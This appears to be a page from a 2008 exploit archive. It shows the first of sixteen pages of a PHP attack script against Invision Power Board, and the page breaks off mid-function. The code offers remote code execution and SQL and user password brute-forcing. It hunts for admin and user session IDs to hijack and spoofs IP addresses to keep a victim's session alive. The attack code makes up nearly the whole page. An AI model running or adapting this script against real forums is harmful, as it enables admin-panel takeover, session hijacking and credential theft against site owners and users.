Add date: 10/16/2008   Publishing date: 10/16/2008   Hits: 8

---

Total 16 pages, Current page:1, Jump to page: 12345678910111213141516

#!/usr/bin/php -q <?php error_reporting(E_ALL ^ E_NOTICE); # yeah ... it rox (: class ipb_spl { var $web; function main() { $this->mhead(); # Gimme your args $this->p_attack = $this->get_p('attack', true); $this->p_prox   = $this->get_p('proxhost'); $this->p_proxa  = $this->get_p('proxauth'); $this->init_global(); # Proxy params if( $this->p_prox ) { $this->web->proxy($this->p_prox); if( $this->p_proxa ) $this->web->proxyauth($this->p_proxa); } # Where do we go ? switch( $this->p_attack ) { case 1: $this->code_exec();  break; case 2:  $this->bf_sql_pwd(); break; case 3:  $this->bf_usr_pwd(); break; default: $this->usage(); } return; } function code_exec($loop=1) { # First loop if( $loop == 1 ) { $this->set_sql_param(); $this->set_sql_focus(); $this->p_acp = $this->get_p('acp'); # ACP path if( !$this->p_acp ) { # If the user changed the ACP directory, we can # find it (if the "Remove ACP Link" option was not # applied) by log in as an Admin, and then click # on "Admin CP". This can be done with a user # but I didn't implemented that  ;) $this->msg('Using default ACP path: admin', 1); $this->p_acp = 'admin'; } else $this->msg('Using ACP path "'.$this->p_acp.'"', 1); # Init client headers: # Only if we have the same IP as the targeted user (not admin), # it resets session datas, so we try to spoof our # IP as a random one in order to keep user's session datas while # we bruteforce SQL fields. $this->bypass_matches(); # Remove expired sessions ( time() - 60*60*2  =  > 2 hours ) $this->web->get($this->p_url.$this->p_acp.'/index.php?'); $this->msg('Removed all out of date admin sessions', 1); # Cookie prefix $this->get_cprefix(); } # Admin session ? $this->msg('Trying to find an admin session id', 0); # Got one :] if( $this->get_admin_sess() ) { $this->s_admin = true; $this->s_sess  = $this->data['a_sess_id']; $this->a_url   = $this->p_url.$this->p_acp.'/index.php?adsess='.$this->s_sess; } # Nothing special else { $this->s_admin = false; $this->msg('No admin session id found', -1); } # User session ? if( !$this->s_sess ) { $this->msg('Trying to find a user session id', 0); # Yep if( $this->get_user_sess() ) $this->s_sess = $this->data['u_sess_id']; # F0ck else { $this->msg('No user session id found', -1); $this->msg('Admin session > 2 hours or user logged out', 0); $this->msg('Keeping trying until the user connects', 0); $this->msg('Entering loop #'.$loop.' ...', 0); $this->code_exec(++$loop); } } $this->msg('Getting security options', 0); # Security options $this->get_sec_options(); # IP filter ? if( $this->conf['ip'] === '1' )   Other pages: : 1 * 2 * 3 * 4 * 5 * 6 * 7 * 8 * 9 * 10 * 11 * 12 * 13 * 14 * 15 * 16 * Next>>

Prev:Invision Power Board

Next:Acoustica Beatcraft 1.02 Build 19 (bcproj file) Local BOF Exploit

Comment:

---

Category: Home > Exploit